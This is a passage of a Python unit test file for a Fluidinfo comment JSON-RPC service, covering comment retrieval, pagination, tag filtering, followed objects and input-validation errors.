comments.create(u'Comment 1', u'username', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getForObject', about=u'about',
additionalTags=[])
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 2',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/2',
u'fluidinfo.com/info/username': u'username'},
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForObjectWithAdditionalTagsInvalidPath(self):
"""
The C{getForObject} method raises an error if the C{additionalTags}
argument contains an invalid tag path.
"""
result = yield self.invoke('getForObject', about=u'about',
additionalTags=[u'///'])
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"u'///' is not a valid path for "
+ "additionalTags.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetForObjectWithAdditionalTagsUnknownPath(self):
"""
The C{getForObject} method raises an error if the C{additionalTags}
argument contains an unknown tag path.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time, url='http://example.com/1')
self.store.commit()
# Get the comment ID based on the expected about value
commentAbout = u'fluidinfo.com username %s' % time.isoformat()
commentID = ObjectAPI(self.user).create(commentAbout)
TagValueAPI(self.user).set({commentID: {u'username/custom': u'Honk'}})
self.store.commit()
result = yield self.invoke('getForObject', about=u'about',
additionalTags=[u'username/custom',
u'nosuchuser/unknowntag'])
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Unknown path in additionalTags: " +
u"'nosuchuser/unknowntag'.",
u'code': BAD_REQUEST}},
loads(result))
def testGetForObjectWithAdditionalTagsInvalidType(self):
"""
The C{getForObject} method raises an error if the C{additionalTags}
argument contains an invalid type in a tag path.
"""
result = yield self.invoke('getForObject', about=u'about',
additionalTags=[666])
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Invalid type in additionalTags.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testSummarizeObject(self):
"""
The C{summarizeObject} method returns summary information for the
comments about an object.
"""
comments = SecureCommentAPI(self.user)
comments.create(u'I drank #whisky with @ntoll and @terrycojones',
u'username', about=[u'about'])
self.store.commit()
result = yield self.invoke('summarizeObject', about=u'about')
result = loads(result)['result']
self.assertEqual({'commentCount': 1, 'followers': [],
'relatedObjects': {'#whisky': 1,
u'@ntoll': 1,
u'@terrycojones': 1}},
result)
@inlineCallbacks
def testSummarizeObjectWithEmptyAboutValue(self):
"""
The C{summarizeObject} method returns a C{BAD_REQUEST} error if the
specified about value is empty.
"""
result = yield self.invoke('summarizeObject', about=u'')
self.assertEqual({u'jsonrpc': u'2.0', u'id': 100,
u'error': {u'message': u'Need an about value.',
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testSummarizeObjectWithWhitespaceAboutValue(self):
"""
The C{summarizeObject} method returns a C{BAD_REQUEST} error if the
specified about value only contains whitespace.
"""
result = yield self.invoke('summarizeObject', about=u' \n')
self.assertEqual({u'jsonrpc': u'2.0', u'id': 100,
u'error': {u'message': u'Need an about value.',
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetForUserWithoutComments(self):
"""
The C{getForUser} method returns an empty C{list} if no comments are
available for the specified about value.
"""
result = yield self.invoke('getForUser', username=u'username')
self.assertEqual({'id': 100, 'jsonrpc': '2.0',
'result': {'nextPageID': None,
'currentPageID': None,
'comments': []}},
loads(result))
@inlineCallbacks
def testGetForUser(self):
"""
The C{getForUser} method returns the comments available from the
specified user, sorted from newest to oldest.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getForUser', username=u'username')
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 2',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/2',
u'fluidinfo.com/info/username': u'username'},
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForUserWithNextPageID(self):
"""
The C{getForUser} method uses the C{nextPageID} to return the correct
page of comments.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getForUser', username='username',
nextPageID=1336604400.0)
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336518000.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForUserWithCurrentPageID(self):
"""
The C{getForUser} method uses the C{currentPageID} to return the
correct page of comments.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time + timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getForUser', username='username',
currentPageID=1336604400.0)
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336690800.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336690800.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForUserWithFilterTags(self):
"""
The C{getForUser} method invoked with a list of C{filterTags}
returns only comments with the filtered tags present.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
comments.create(u'Comment 3', u'username', about=[u'about'],
when=time + timedelta(days=1),
url='http://example.com/3')
# Comment 1 gets only username/tag1
commentAbout1 = u'fluidinfo.com username %s' \
% (time - timedelta(days=1)).isoformat()
commentID1 = ObjectAPI(self.user).create(commentAbout1)
TagValueAPI(self.user).set({commentID1: {u'username/tag1': u'Monkey'}})
# Comment 2 gets both username/tag1 and username/tag2
commentAbout2 = u'fluidinfo.com username %s' % time.isoformat()
commentID2 = ObjectAPI(self.user).create(commentAbout2)
TagValueAPI(self.user).set({commentID2: {u'username/tag1': u'Monkey',
u'username/tag2': u'Ape'}})
self.store.commit()
# Comment 3 has no tags at all.
result = yield self.invoke('getForUser', username=u'username',
filterTags=[u'username/tag1',
u'username/tag2'])
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 2',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/2',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForUserWithFilterTagsAndAdditionalTags(self):
"""
The C{getForUser} method invoked with a list of C{filterTags}
returns only comments with the filtered tags present and the values of
any tags specified in C{additionalTags}.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
# Get the comment ID based on the expected about value
commentAbout = u'fluidinfo.com username %s' % time.isoformat()
commentID = ObjectAPI(self.user).create(commentAbout)
TagValueAPI(self.user).set({commentID: {u'username/tag': u'Monkey'}})
self.store.commit()
result = yield self.invoke('getForUser', username=u'username',
filterTags=[u'username/tag'],
additionalTags=[u'username/tag'])
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 2',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/2',
u'fluidinfo.com/info/username': u'username',
u'username/tag': u'Monkey'}]},
result)
@inlineCallbacks
def testGetForUserWithfilterAbout(self):
"""
The C{getForUser} method returns the comments for the specified
user and also with the given object filter, sorted from newest to
eldest.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username',
about=[u'about', u'+filter'],
when=time,
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time + timedelta(days=1),
url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getForUser', username='username',
filterAbout='+filter')
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about', u'+filter'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForUserWithMalformedNextPageID(self):
"""
The C{getForUser} method raises an error if the C{nextPageID} argument
is not well formed.
"""
result = yield self.invoke('getForUser', username='username',
nextPageID='malformed')
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Couldn't parse nextPageID.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetForUserWithMalformedCurrentPageID(self):
"""
The C{getForUser} method raises an error if the C{currentPageID}
argument is not well formed.
"""
result = yield self.invoke('getForUser', username='username',
currentPageID='malformed')
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Couldn't parse currentPageID.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetForUserReturnsNextPageID(self):
"""
The C{getForUser} method returns a C{nextPageID} value when another
page of comments could be loaded.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
for i in range(26):
comments.create(u'Comment', u'username', about=[u'about'],
when=time - timedelta(minutes=i),
url='http://example.com/comment')
self.store.commit()
result = yield self.invoke('getForUser', username='username')
result = loads(result)['result']
self.assertEqual(1336602960, result['nextPageID'])
self.assertEqual(25, len(result['comments']))
@inlineCallbacks
def testGetForUserWithAdditionalTags(self):
"""
The C{getForUser} method invoked with a list of C{additionalTags}
returns those in addition to the default ones.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
# Get the comment ID based on the expected about value
commentAbout = u'fluidinfo.com username %s' % time.isoformat()
commentID = ObjectAPI(self.user).create(commentAbout)
TagValueAPI(self.user).set({commentID: {u'username/custom': u'Honk'}})
self.store.commit()
result = yield self.invoke('getForUser', username=u'username',
additionalTags=[u'username/custom'])
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 2',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/2',
u'fluidinfo.com/info/username': u'username',
u'username/custom': u'Honk'},
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForUserWithAdditionalTagsEmptyList(self):
"""
The C{getForUser} method, if invoked with an empty C{additionalTags}
list acts the same as when none are specified.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getForUser', username=u'username',
additionalTags=[])
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 2',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/2',
u'fluidinfo.com/info/username': u'username'},
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForUserWithAdditionalTagsInvalidPath(self):
"""
The C{getForUser} method raises an error if the C{additionalTags}
argument contains an invalid tag path.
"""
result = yield self.invoke('getForUser', username=u'username',
additionalTags=[u'///'])
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"u'///' is not a valid path for "
+ "additionalTags.",
u'code': BAD_REQUEST}},
loads(result))
def testGetForUserWithAdditionalTagsInvalidType(self):
"""
The C{getForUser} method raises an error if the C{additionalTags}
argument contains an invalid type in a tag path.
"""
result = yield self.invoke('getForUser', username=u'username',
additionalTags=[666])
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Invalid type in additionalTags.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetAllFollowedWithoutComments(self):
"""
The C{getAllFollowed} method returns an empty C{list} if no comments
are available for the specified about value.
"""
result = yield self.invoke('getAllFollowed', username=u'username')
self.assertEqual({'id': 100, 'jsonrpc': '2.0',
'result': {'nextPageID': None,
'currentPageID': None,
'comments': []}},
loads(result))
@inlineCallbacks
def testGetRecent(self):
"""The C{getRecent} method returns recent comments."""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about 1'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about 2'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getRecent')
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about 2'],
u'fluidinfo.com/info/text': u'Comment 2',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/2',
u'fluidinfo.com/info/username': u'username'},
{u'fluidinfo.com/info/about': [u'about 1'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetRecentWithNextPageID(self):
"""
The C{getRecent} method uses the C{nextPageID} to return the
correct page of comments.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about 1'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about 2'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getRecent', nextPageID=1336604400.0)
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336518000.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about 1'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetRecentWithCurrentPageID(self):
"""
The C{getRecent} method uses the C{currentPageID} to return the
correct page of comments.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about 1'],
when=time + timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about 2'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getRecent', currentPageID=1336604400.0)
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336690800.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about 1'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336690800.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetRecentWithMalformedNextPageID(self):
"""The C{getRecent} method raises an error if the C{nextPageID}."""
result = yield self.invoke('getRecent', nextPageID='malformed')
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Couldn't parse nextPageID.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetRecentWithMalformedCurrentPageID(self):
"""The C{getRecent} method raises an error if the C{currentPageID}."""
result = yield self.invoke('getRecent', currentPageID='malformed')
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Couldn't parse currentPageID.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetRecentReturnsNextPageID(self):
"""
The C{getRecent} method returns a C{nextPageID} value when another page
of comments could be loaded.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
for i in range(26):
comments.create(u'Comment', u'username', about=[u'about'],
when=time - timedelta(minutes=i),
url='http://example.com/comment')
self.store.commit()
result = yield self.invoke('getRecent')
result = loads(result)['result']
self.assertEqual(1336602960, result['nextPageID'])
self.assertEqual(25, len(result['comments']))
@inlineCallbacks
def testGetRecentWithFilterTagsAndAdditionalTags(self):
"""
The C{getRecent} method returns all comments with C{filterTags} present
and all values of the tags in C{additionalTags}.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about 1'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about 2'],
when=time, url='http://example.com/2')
self.store.commit()
# Get the comment ID based on the expected about value
commentAbout = u'fluidinfo.com username %s' % time.isoformat()
commentID = ObjectAPI(self.user).create(commentAbout)
TagValueAPI(self.user).set({commentID: {u'username/tag1': u'Monkey'}})
self.store.commit()
result = yield self.invoke('getRecent',
filterTags=[u'username/tag1'],
additionalTags=[u'username/tag1'])
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [{u'fluidinfo.com/info/about': [u'about 2'],
u'fluidinfo.com/info/text': u'Comment 2',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/2',
u'fluidinfo.com/info/username': u'username',
u'username/tag1': u'Monkey'}]},
result)
@inlineCallbacks
def testGetAllFollowed(self):
"""
The C{getAllFollowed} method returns the comments on the followed
objects and users.
"""
time = datetime.utcfromtimestamp(1336604400)
objectID1 = ObjectAPI(self.user).create(u'about 1')
objectID2 = ObjectAPI(self.user).create(u'about 2')
TagValueAPI(self.user).set({objectID1: {u'username/follows': None},
objectID2: {u'username/follows': None}})
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about 1'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about 2'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getAllFollowed', username=u'username')
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about 2'],
u'fluidinfo.com/info/text': u'Comment 2',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/2',
u'fluidinfo.com/info/username': u'username'},
{u'fluidinfo.com/info/about': [u'about 1'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetAllFollowedWithNextPageID(self):
"""
The C{getAllFollowed} method uses the C{nextPageID} to return the
correct page of comments.
"""
time = datetime.utcfromtimestamp(1336604400)
objectID1 = ObjectAPI(self.user).create(u'about 1')
objectID2 = ObjectAPI(self.user).create(u'about 2')
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about 1'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about 2'],
when=time, url='http://example.com/2')
TagValueAPI(self.user).set({objectID1: {u'username/follows': None},
objectID2: {u'username/follows': None}})
self.store.commit()
result = yield self.invoke('getAllFollowed', username=u'username',
nextPageID=1336604400.0)
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336518000.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about 1'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetAllFollowedWithCurrentPageID(self):
"""
The C{getAllFollowed} method uses the C{currentPageID} to return the
correct page of comments.
"""
time = datetime.utcfromtimestamp(1336604400)
objectID1 = ObjectAPI(self.user).create(u'about 1')
objectID2 = ObjectAPI(self.user).create(u'about 2')
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about 1'],
when=time + timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about 2'],
when=time, url='http://example.com/2')
TagValueAPI(self.user).set({objectID1: {u'username/follows': None},
objectID2: {u'username/follows': None}})
self.store.commit()
result = yield self.invoke('getAllFollowed', username=u'username',
currentPageID=1336604400.0)
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336690800.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about 1'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336690800.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetAllFollowedWithMalformedNextPageID(self):
"""
The C{getAllFollowed} method raises an error if the C{nextPageID}.
"""
result = yield self.invoke('getAllFollowed', username=u'username',
nextPageID='malformed')
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Couldn't parse nextPageID.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetAllFollowedWithMalformedCurrentPageID(self):
"""
The C{getAllFollowed} method raises an error if the C{currentPageID}.
"""
result = yield self.invoke('getAllFollowed', username=u'username',
currentPageID='malformed')
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Couldn't parse currentPageID.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetAllFollowedReturnsNextPageID(self):
"""
The C{getAllFollowed} method returns a C{nextPageID} value when
another page of comments could be loaded.
"""
time = datetime.utcfromtimestamp(1336604400)
objectID = ObjectAPI(self.user).create(u'about')
TagValueAPI(self.user).set({objectID: {u'username/follows': None}})
comments = SecureCommentAPI(self.user)
for i in range(26):
comments.create(u'Comment', u'username', about=[u'about'],
when=time - timedelta(minutes=i),
url='http://example.com/comment')
self.store.commit()
result = yield self.invoke('getAllFollowed', username='username')
result = loads(result)['result']
self.assertEqual(1336602960, result['nextPageID'])
self.assertEqual(25, len(result['comments']))
@inlineCallbacks
def testGetFollowedObjectsWithoutFollows(self):
"""
The C{getFollowedObjects} method returns an empty C{list} if no
objects are being followed by the specified user.
"""
result = yield self.invoke('getFollowedObjects', username=u'username')
self.assertEqual({u'id': 100, u'jsonrpc': u'2.0',
u'result': {u'nextPageID': None, u'objects': []}},
loads(result))
@inlineCallbacks
def testGetFollowedObjects(self):
"""
The C{getFollowedObjects} method returns a list of objects followed by
the specified user along with an indication if the currently logged in
user follows those objects too.
"""
objectID1 = ObjectAPI(self.user).create(u'about 1')
objectID2 = ObjectAPI(self.user).create(u'about 2')
TagValueAPI(self.user).set({objectID1: {u'username/follows': None},
objectID2: {u'username/follows': None}})
self.store.commit()
result = yield self.invoke('getFollowedObjects', username=u'username')
result = loads(result)['result']
self.assertEqual(None, result['nextPageID'])
aboutValues = [u'about 1', u'about 2']
self.assertTrue(2, len(result['objects']))
# Can't be certain of the order the objects will be returned given that
# they'll have the same creationTime value in the database.
for obj in result['objects']:
self.assertTrue(obj['about'] in aboutValues)
self.assertEqual(True, obj['following'])
@inlineCallbacks
def testGetFollowedObjectsWithNextPageID(self):
"""
The C{getFollowedObjects} method uses the C{nextPageID} to return the
correct page of objects.
"""
objectID1 = ObjectAPI(self.user).create(u'about 1')
objectID2 = ObjectAPI(self.user).create(u'about 2')
TagValueAPI(self.user).set({objectID1: {u'username/follows': None}})
self.store.commit()
timestamp = get_time()
TagValueAPI(self.user).set({objectID2: {u'username/follows': None}})
self.store.commit()
result = yield self.invoke('getFollowedObjects', username=u'username',
nextPageID=timestamp)
result = loads(result)['result']
self.assertEqual(None, result['nextPageID'])
self.assertEqual(1, len(result['objects']))
self.assertEqual(u'about 1', result['objects'][0]['about'])
@inlineCallbacks
def testGetFollowsWithMalformedNextPageID(self):
"""
The C{getFollowedObjects} method raises an error if the C{nextPageID}
is malformed.
"""
result = yield self.invoke('getFollowedObjects', username=u'username',
nextPageID='malformed')
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Couldn't parse nextPageID.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetFollowedObjectsWithURLObjectType(self):
"""
The C{getFollowedObjects} method returns a list of URL objects with
the C{objectType} is a URL.
"""
objectID1 = ObjectAPI(self.user).create(u'about 1')
objectID2 = ObjectAPI(self.user).create(u'http://www.google.com')
TagValueAPI(self.user).set({objectID1: {u'username/follows': None},
objectID2: {u'username/follows': None}})
self.store.commit()
result = yield self.invoke('getFollowedObjects', username=u'username',
objectType='url')
result = loads(result)['result']
self.assertEqual(1, len(result['objects']))
self.assertEqual(u'http://www.google.com',
result['objects'][0]['about'])
@inlineCallbacks
def testGetFollowedObjectsWithUserObjectType(self):
"""
The C{getFollowedObjects} method returns a list of user objects with
the C{objectType} is a user.
"""
objectID1 = ObjectAPI(self.user).create(u'about 1')
objectID2 = ObjectAPI(self.user).create(u'@paparent')
TagValueAPI(self.user).set({objectID1: {u'username/follows': None},
objectID2: {u'username/follows': None}})
self.store.commit()
result = yield self.invoke('getFollowedObjects', username=u'username',
objectType='user')
result = loads(result)['result']
self.assertEqual(1, len(result['objects']))
self.assertEqual(u'@paparent',
result['objects'][0]['about'])
@inlineCallbacks
def testGetFollowedObjectsWithHashtagObjectType(self):
"""
The C{getFollowedObjects} method returns a list of hashtag objects
with the C{objectType} is a hashtag.
"""
objectID1 = ObjectAPI(self.user).create(u'about 1')
objectID2 = ObjectAPI(self.user).create(u'#like')
TagValueAPI(self.user).set({objectID1: {u'username/follows': None},
objectID2: {u'username/follows': None}})
self.store.commit()
result = yield self.invoke('getFollowedObjects', username=u'username',
objectType='hashtag')
result = loads(result)['result']
self.assertEqual(1, len(result['objects']))
self.assertEqual(u'#like',
result['objects'][0]['about'])
@inlineCallbacks
def testGetFollowedObjectsWithoutURLObjectType(self):
"""
The C{getFollowedObjects} method returns an empty list if there is no
object of C{objectType} url.
"""
objectID1 = ObjectAPI(self.user).create(u'#like')
objectID2 = ObjectAPI(self.user).create(u'@paparent')
TagValueAPI(self.user).set({objectID1: {u'username/follows': None},
objectID2: {u'username/follows': None}})
self.store.commit()
result = yield self.invoke('getFollowedObjects', username=u'username',
objectType='url')
result = loads(result)['result']
self.assertEqual(0, len(result['objects']))
@inlineCallbacks
def testGetFollowedObjectsWithoutUserObjectType(self):
"""
The C{getFollowedObjects} method returns an empty list if there is no
object of C{objectType} user.
"""
objectID1 = ObjectAPI(self.user).create(u'#like')
objectID2 = ObjectAPI(self.user).create(u'http://google.com')
TagValueAPI(self.user).set({objectID1: {u'username/follows': None},
objectID2: {u'username/follows': None}})
self.store.commit()
result = yield self.invoke('getFollowedObjects', username=u'username',
objectType='user')
result = loads(result)['result']
self.assertEqual(0, len(result['objects']))
@inlineCallbacks
def testGetFollowedObjectsWithoutHashtagObjectType(self):
"""
The C{getFollowedObjects} method returns an empty list if there is no
object of C{objectType} hashtag.
"""
objectID1 = ObjectAPI(self.user).create(u'http://google.com')
